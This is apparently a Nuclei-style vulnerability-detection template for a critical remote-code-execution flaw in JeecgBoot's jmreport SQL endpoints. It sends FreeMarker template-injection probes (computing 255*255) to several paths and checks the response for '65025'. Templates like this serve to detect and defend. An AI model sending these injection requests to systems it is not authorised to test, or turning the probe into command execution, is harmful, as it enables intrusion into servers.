http:
    - extractors:
        - group: 1
          internal: true
          name: jslist
          part: body_3
          regex:
            - script src=/js/app.(.*?).js>
          type: regex
        - group: 3
          internal: true
          name: basepath1
          part: body_4
          regex:
            - (API_BASE_URL|VUE_APP_API_BASE_URL)[:=]"https?://(.*?)/(.*?)/?"
          type: regex
        - json:
            - .result.fieldList[0].fieldName
          part: body
          type: json
      matchers:
        - condition: or
          dsl:
            - contains_all(body,'65025','fieldText')
          type: dsl
      raw:
        - |
          POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
          Content-Type: application/json;charset=UTF-8

          {"sql":"select '<#assign result = 255 * 255> ${result}' "}
        - |
          POST /jmreport/qurestSql HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
          Content-Type: application/json;charset=UTF-8

          {"sql":"select '<#assign result = 255 * 255> ${result}' "}
        - "GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\n       \n"
        - |
          GET /js/app.{{jslist}}.js HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
        - |
          POST /{{basepath1}}/jmreport/queryFieldBySql HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/json;charset=UTF-8
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
          Content-Type: application/json;charset=UTF-8

          {"sql":"select '<#assign result = 255 * 255> ${result}' "}
      stop-at-first-match: true
id: jeecg-boot-queryfieldbysql-rce
info:
    author: msk
    name: jeecg-boot-queryfieldbysql-rce
    severity: critical
    tags: []
